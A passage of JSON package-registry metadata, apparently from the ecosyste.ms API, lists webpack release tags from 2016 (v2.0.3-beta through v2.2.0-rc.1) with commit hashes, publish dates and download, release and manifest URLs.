c.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.